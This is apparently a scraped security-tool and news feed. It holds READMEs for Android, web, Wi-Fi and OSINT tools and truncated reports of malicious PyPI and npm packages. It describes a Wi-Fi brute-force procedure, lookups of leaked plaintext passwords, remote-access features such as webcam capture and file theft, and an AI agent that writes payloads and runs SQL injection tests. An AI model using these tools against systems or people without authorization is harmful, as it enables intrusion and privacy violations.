    ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


    ~ Hilali Abdel

    USAGE

    python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

    [Add new Device]

    python3 smartthings.py -a 192.168.1.1

    python3 smarthings.py -s --type TPLINK

    python3 smartthings.py -s --firmware TP-Link Archer C7v2

    Search for CVE and Poc [ firmware and device type]

    Β 

    Scan device for open upnp ports

    python3 smartthings.py -s --scan upnp --id

    get data from mqtt 'subscribe'

    python3 smartthings.py -s --scan mqtt --id



    Drozer - The Leading Security Assessment Framework For Android

    By: Zion3R


    drozer (formerly Mercury) is the leading security testing framework for Android.

    drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

    drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

    drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.

    drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/


    Docker Container

    To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.

    • The Docker container and basic setup instructions can be found here.
    • Instructions on building your own Docker container can be found here.

    Manual Building and Installation

    Prerequisites

    1. Python2.7

    Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

    1. Protobuf 2.6 or greater

    2. Pyopenssl 16.2 or greater

    3. Twisted 10.2 or greater

    4. Java Development Kit 1.7

    Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

    1. Android Debug Bridge

    Building Python wheel

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    python setup.py bdist_wheel

    Installing Python wheel

    sudo pip install dist/drozer-2.x.x-py2-none-any.whl

    Building for Debian/Ubuntu/Mint

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    make deb

    Installing .deb (Debian/Ubuntu/Mint)

    sudo dpkg -i drozer-2.x.x.deb

    Building for Redhat/Fedora/CentOS

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    make rpm

    Installing .rpm (Redhat/Fedora/CentOS)

    sudo rpm -I drozer-2.x.x-1.noarch.rpm

    Building for Windows

    NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    python.exe setup.py bdist_msi

    Installing .msi (Windows)

    Run dist/drozer-2.x.x.win-x.msi 

    Usage

    Installing the Agent

    Drozer can be installed using Android Debug Bridge (adb).

    Download the latest Drozer Agent here.

    $ adb install drozer-agent-2.x.x.apk

    Starting a Session

    You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

    We will use the server embedded in the drozer Agent to do this.

    If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

    $ adb forward tcp:31415 tcp:31415

    Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

    Then, on your PC, connect using the drozer Console:

    On Linux:

    $ drozer console connect

    On Windows:

    > drozer.bat console connect

    If using a real device, the IP address of the device on the network must be specified:

    On Linux:

    $ drozer console connect --server 192.168.0.10

    On Windows:

    > drozer.bat console connect --server 192.168.0.10

    You should be presented with a drozer command prompt:

    selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
    dz>

    The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

    You are now ready to start exploring the device.

    Command Reference

    Command Description
    run Executes a drozer module
    list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
    shell Start an interactive Linux shell on the device, in the context of the Agent process.
    cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
    clean Remove temporary files stored by drozer on the Android device.
    contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
    echo Print text to the console.
    exit Terminate the drozer session.
    help Display help about a particular command or module.
    load Load a file containing drozer commands, and execute them in sequence.
    module Find and install additional drozer modules from the Internet.
    permissions Display a list of the permissions granted to the drozer Agent.
    set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
    unset Remove a named variable that drozer passes to any Linux shells that it spawns.

    License

    drozer is released under a 3-clause BSD License. See LICENSE for full details.

    Contacting the Project

    drozer is Open Source software, made great by contributions from the community.

    Bug reports, feature requests, comments and questions can be submitted here.



    DroidLysis - Property Extractor For Android Apps

    By: Zion3R


    DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

    DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


    Installing DroidLysis

    1. Install required system packages
    sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
    1. Install Android disassembly tools

    2. Apktool ,

    3. Baksmali, and optionally
    4. Dex2jar and
    5. Obsolete: Procyon (note that Procyon only works with Java 8, not Java 11).
    $ mkdir -p ~/softs
    $ cd ~/softs
    $ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
    $ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
    $ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
    $ unzip dex-tools-v2.4.zip
    $ rm -f dex-tools-v2.4.zip
    1. Get DroidLysis from the Git repository (preferred) or from pip

    Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

    $ python3 -m venv venv
    $ source ./venv/bin/activate
    (venv) $ pip3 install git+https://github.com/cryptax/droidlysis

    Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

    1. Configure conf/general.conf. In particular make sure to change /home/axelle with your appropriate directories.
    [tools]
    apktool = /home/axelle/softs/apktool_2.9.3.jar
    baksmali = /home/axelle/softs/baksmali-2.5.2.jar
    dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
    procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
    keytool = /usr/bin/keytool
    ...
    1. Run it:
    python3 ./droidlysis3.py --help

    Configuration

    The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql)

    Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

    Usage

    DroidLysis uses Python 3. To launch it and get options:

    droidlysis --help

    For example, test it on Signal's APK:

    droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

    DroidLysis outputs:

    • A summary on the console (see image above)
    • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
    • A database (by default, SQLite droidlysis.db) containing properties it noticed.

    Options

    Get usage with droidlysis --help

    • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other type of files (unless there is a bug...) but won't be able to understand the content.

    • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

    • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

    • DroidLysis's analysis does not inspect known 3rd party SDK by default, i.e. for instance it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisment) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

    Sample output directory (--output DIR)

    This directory contains (when applicable):

    • A readable AndroidManifest.xml
    • Readable resources in res
    • Libraries lib, assets assets
    • Disassembled Smali code: smali (and others)
    • Package meta information: META-INF
    • Package contents when simply unzipped in ./unzipped
    • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

    The following files are generated by DroidLysis:

    • autoanalysis.md: lists each pattern DroidLysis detected and where.
    • report.md: same as what was printed on the console

    If you do not need the sample output directory to be generated, use the option --clearoutput.

    Import trackers from Exodus etc (--import-exodus)

    $ python3 ./droidlysis3.py --import-exodus --verbose
    Processing file: ./droidurl.pyc ...
    DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
    DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
    DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
    DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
    DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
    DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

    Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

    SQLite database{#sqlite_database}

    If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.

    For example, to retrieve all filename, SHA256 sum and smali properties of the database:

    sqlite> select sha256, sanitized_basename, smali_properties from samples;
    f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
    ...

    Property patterns

    What DroidLysis detects can be configured and extended in the files of the ./conf directory.

    A pattern consist of:

    • a tag name: example send_sms. This is to name the property. Must be unique across the .conf file.
    • a pattern: this is a regexp to be matched. Ex: ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is match on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
    • a description (optional): explains the importance of the property and what it means.
    [send_sms]
    pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
    description=Sending SMS messages

    Importing Exodus Privacy Trackers

    Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import_exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

    Afterwards, you may want to sort your kit.conf file:

    import configparser
    import collections
    import os

    config = configparser.ConfigParser({}, collections.OrderedDict)
    config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
    # Order all sections alphabetically
    config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
    with open('sorted.conf','w') as f:
    config.write(f)

    Updates

    • v3.4.6 - Detecting manifest feature that automatically loads APK at install
    • v3.4.5 - Creating a writable user kit.conf file
    • v3.4.4 - Bug fix #14
    • v3.4.3 - Using configuration files
    • v3.4.2 - Adding import of Exodus Privacy Trackers
    • v3.4.1 - Removed dependency to Androguard
    • v3.4.0 - Multidex support
    • v3.3.1 - Improving detection of Base64 strings
    • v3.3.0 - Dumping data to JSON
    • v3.2.1 - IP address detection
    • v3.2.0 - Dex2jar is optional
    • v3.1.0 - Detection of Base64 strings


    PyPI Halts Sign-Ups Amid Surge of Malicious Package Uploads Targeting Developers

    The maintainers of the Python Package Index (PyPI) repository briefly suspended new user sign-ups following an influx of malicious projects uploaded as part of a typosquatting campaign. PyPI said "new project creation and new user registration" was temporarily halted to mitigate what it said was a "malware upload campaign." The incident was resolved 10 hours later, on March 28, 2024, at 12:56

    Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals

    By: Zion3R


    Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


    Pentest Muse Web App

    In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

    Disclaimer

    This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

    Requirements

    • Python 3.12 or later
    • Necessary Python packages as listed in requirements.txt

    Setup

    Standard Setup

    1. Clone the repository:

    git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse

    1. Install the required packages:

    pip install -r requirements.txt

    Alternative Setup (Package Installation)

    Install Pentest Muse as a Python Package:

    pip install .

    Running the Application

    Chat Mode (Default)

    In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

    python run_app.py

    or

    pmuse

    Agent Mode (Experimental)

    You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:

    python run_app.py agent

    or

    pmuse agent

    Selection of Language Models

    Managed APIs

    You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.

    OpenAI API keys

    Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

    Contact

    For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.



    AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials

    Cybersecurity researchers have shed light on a tool referred to as&nbsp;AndroxGh0st&nbsp;that's used to target Laravel applications and steal sensitive data. "It works by scanning and taking out important information from .env files, revealing login details linked to AWS and Twilio," Juniper Threat Labs researcher Kashinath T Pattan&nbsp;said. "Classified as an SMTP cracker, it exploits SMTP

    GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist

    By: Zion3R

    This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.


    TL;DR

    Installation

    1. Visit Jython Offical Site, and download the latest stand alone JAR file, e.g. jython-standalone-2.7.3.jar.
    2. Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
    3. On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
    4. Download the GAP.py and requirements.txt from this project and place in the same directory.
    5. Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
    6. Go to the Extensions -> Installed and click Add under Burp Extensions.
    7. Select Extension type of Python and select the GAP.py file.

    Using

    1. Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:

    Or you can right click a request or response in any other context and select GAP from the Extensions menu.

    1. Then go to the GAP tab to see the results:

    IMPORTANT Notes

    If you don't need one of the modes, then un-check it as results will be quicker.

    If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two target in the Site Map view at a time, as huge projects can have consume a lot of resources.

    If you want to run GAP on one of more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.

    It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.

    The Words mode uses the beautifulsoup4 library and this can be quite slow, so be patient!

    In Depth Instructions

    Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.

    NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.

    TODO

    • Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
    • Add an option to not add the Tentaive Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).
    • Improve performance of the link finding regular expressions.
    • Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
    • Deal with other size displays and font sizes better to make sure all controls are viewable.
    • If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
    • Use an alternative to beautifulsoup4 that is faster to parse responses for Words.

    Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! β˜• (I could use the caffeine!)

    🀘 /XNL-h4ck3r



    DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes

    By: Zion3R


    DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.


    Prerequisites

    Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.

    Environment Setup

    1. Clone the Repository

    First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:

    git clone https://github.com/luijait/DarkGPT.git cd DarkGPT

    1. Configure Environment Variables

    You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:

    DEHASHED_API_KEY="your_dehashed_api_key_here"

    1. Install Dependencies

    This project requires certain Python packages to run. Install them by running the following command:

    pip install -r requirements.txt 4. Then Run the project: python3 main.py



    WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies

    By: Zion3R


    WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.


    Installation

    The packages are minimal or nearly none πŸ˜…. The package install command is:

    pip install rich pyfiglet

    Thats it.


    Features

    So listing the features:

    • Overall Features:
    • We can use custom interfaces or non-default interfaces to run the attack.
    • Well-defined way of using netsh and listing and utilizing targets.
    • Upgradeability
    • Code-Wise Features:
    • Interactive menu-driven system with rich.
    • versatility in using interface, targets, and password files.

    How it works

    So this is how the bruteforcer works:

    • Provide Interface:

    • The user is required to provide the network interface for the tool to use.

    • By default, the interface is set to Wi-Fi.

    • Search and Set Target:

    • The user must search for and select the target network.

    • During this process, the tool performs the following sub-steps:

      • Disconnects all active network connections for the selected interface.
      • Searches for all available networks within range.
    • Input Password File:

    • The user inputs the path to the password file.

    • The default path for the password file is ./wordlist/default.txt.

    • Run the Attack:

    • With the target set and the password file ready, the tool is now prepared to initiate the attack.

    • Attack Procedure:

    • The attack involves iterating through each password in the provided file.
    • For each password, the following steps are taken:
      • A custom XML configuration for the connection attempt is generated and stored.
      • The tool attempts to connect to the target network using the generated XML and the current password.
      • To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
      • If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
      • This loop continues until a successful ping response is received, indicating a successful connection attempt.

    How to run this

    After installing all the packages just run python main.py rest is history πŸ‘ make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:

    Β 


    Contributions

    For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.



    LeakSearch - Search & Parse Password Leaks

    By: Zion3R


    LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.

    In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.


    Requirements
    • Python 3
    • Install requirements

    Download

    It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

    git clone https://github.com/JoelGMSec/LeakSearch

    Usage
      _               _     ____                      _     
    | | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__
    | | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \
    | |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |
    |_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|

    ------------------- by @JoelGMSec -------------------

    usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

    options:
    -h, --help show this help message and exit
    -d DATABASE, --database DATABASE
    Database used for the search (ProxyNova or LocalDataBase)
    -k KEYWORD, --keyword KEYWORD
    Keyword (user/domain/pass) to search for leaks in the DB
    -n NUMBER, --number NUMBER
    Number of results to show (default is 20)
    -o OUTPUT, --output OUTPUT
    Save the results as json or txt into a file
    -p PROXY, --proxy PROXY
    Set HTTP/S proxy (like http://localhost:8080)


    The detailed guide of use can be found at the following link:

    https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch


    License

    This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.


    Credits and Acknowledgments

    This tool has been created and designed from scratch by Joel GΓ‘mez Molina (@JoelGMSec).


    Contact

    This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

    For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



    Lazarus Exploits Typos to Sneak PyPI Malware into Dev Systems

    The notorious North Korean state-backed hacking group Lazarus uploaded four packages to the Python Package Index (PyPI) repository with the goal of infecting developer systems with malware. The packages, now taken down, are&nbsp;pycryptoenv,&nbsp;pycryptoconf,&nbsp;quasarlib, and&nbsp;swapmempool. They have been collectively downloaded 3,269 times, with pycryptoconf accounting for the most

    Huntr-Com-Bug-Bounties-Collector - Keep Watching New Bug Bounty (Vulnerability) Postings

    By: Zion3R


    New bug bounty(vulnerabilities) collector


    Requirements
    • Chrome with GUI (If you encounter trouble with script execution, check the status of VMs GPU features, if available.)
    • Chrome WebDriver

    Preview
    # python3 main.py

    *2024-02-20 16:14:47.836189*

    1. Arbitrary File Reading due to Lack of Input Filepath Validation
    - Feb 6th 2024 / High (CVE-2024-0964)
    - gradio-app/gradio
    - https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/

    2. View Barcode Image leads to Remote Code Execution
    - Jan 31st 2024 / Critical (CVE: Not yet)
    - dolibarr/dolibarr
    - https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/

    (delimiter-based file database)

    # vim feeds.db

    1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/
    2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/
    3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|https://huntr.com/bounties/d6cb06dc-5d10-4197-8f89-847c3203d953/
    4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|https://huntr.com/bounties/d875d1a2-7205-4b2b-93cf-439fa4c4f961/
    5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|https://huntr.com/bounties/10e423cd-7051-43fd-b736-4e18650d0172/

    Notes
    • This code is designed to parse HTML elements from huntr.com, so it may not function correctly if the HTML page structure changes.
    • In case of errors during parsing, exception handling has been included, so if it doesn't work as expected, please inspect the HTML source for any changes.
    • If get in trouble In a typical cloud environment, scripts may not function properly within virtual machines (VMs).


    North Korean Hackers Targeting Developers with Malicious npm Packages

    A set of fake npm packages discovered on the Node.js repository has been found to share ties with North Korean state-sponsored actors, new findings from Phylum show. The packages are named execution-time-async, data-time-utils, login-time-utils, mongodb-connection-utils, and mongodb-execution-utils. One of the packages in question,&nbsp;execution-time-async, masquerades as its legitimate

    BackDoorSim - An Educational Into Remote Administration Tools

    By: Zion3R


    BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.


    Disclaimer

    This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.


    Features
    • File Transfer: Upload and download files between server and client.
    • Screenshot Capture: Take screenshots from the client's system.
    • System Information Gathering: Retrieve detailed system and security software information.
    • Camera Access: Capture images from the client's webcam.
    • Notifications: Send and display notifications on the client system.
    • Help Menu: Easy access to command information and usage.

    Installation

    To set up BackdoorSim, you will need to install it on both the server and client machines.

    1. Clone the repository:

    shell $ git clone https://github.com/HalilDeniz/BackDoorSim.git

    1. Navigate to the project directory:

    shell $ cd BackDoorSim

    1. Install the required dependencies:

    shell $ pip install -r requirements.txt


    Usage

    After starting both the server and client, you can use the following commands in the server's command prompt:

    • upload [file_path]: Upload a file to the client.
    • download [file_path]: Download a file from the client.
    • screenshot: Capture a screenshot from the client.
    • sysinfo: Get system information from the client.
    • securityinfo: Get security software status from the client.
    • camshot: Capture an image from the client's webcam.
    • notify [title] [message]: Send a notification to the client.
    • help: Display the help menu.

    Disclaimer

    BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.


    DepNot: RansomwareSim

    If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool


    BackdoorSim: An Educational into Remote Administration Tools

    If you want to read our article about Backdoor


    Contributing

    Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.


    Contact

    For any inquiries or further information, you can reach me through the following channels:



    Dormant PyPI Package Compromised to Spread Nova Sentinel Malware

    A dormant package available on the Python Package Index (PyPI) repository was updated nearly after two years to propagate an information stealer malware called Nova Sentinel. The package, named&nbsp;django-log-tracker, was first published to PyPI in April 2022, according to software supply chain security firm Phylum, which&nbsp;detected&nbsp;an anomalous update to the library on February 21,

    SpeedyTest - Command-Line Tool For Measuring Internet Speed

    By: Zion3R


    SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.


    Features
    • Measure download speed, upload speed, and ping latency.
    • Generate detailed reports with graphical representation of speed test results.
    • Save and export test results in various formats (CSV, JSON, etc.).
    • Customize speed test parameters and server selection.
    • Compare speed test results over time to track performance changes.
    • Integrate SpeedyTest into your own applications using the provided API.
    • track your timeline with saved database

    Installation
    git clone https://github.com/HalilDeniz/SpeedyTest.git

    Requirements

    Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:

    pip install -r requirements.txt

    Usage

    Run the following command to perform a speed test:

    python3 speendytest.py

    Visual Output



    Output
    Receiving data \
    Speed test completed!
    Speed test time: 20.22 second
    Server : Farknet - Konya
    IP Address: speedtest.farknet.com.tr:8080
    Country : Turkey
    City : Konya
    Ping : 20.41 ms
    Download : 90.12 Mbps
    Loading : 20 Mbps







    Contributing

    Contributions are welcome! To contribute to SpeedyTest, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    If you have any questions, comments, or suggestions about PrivacyNet, please feel free to contact me:


    License

    SpeedyTest is released under the MIT License. See LICENSE for details.



    New Malicious PyPI Packages Caught Using Covert Side-Loading Tactics

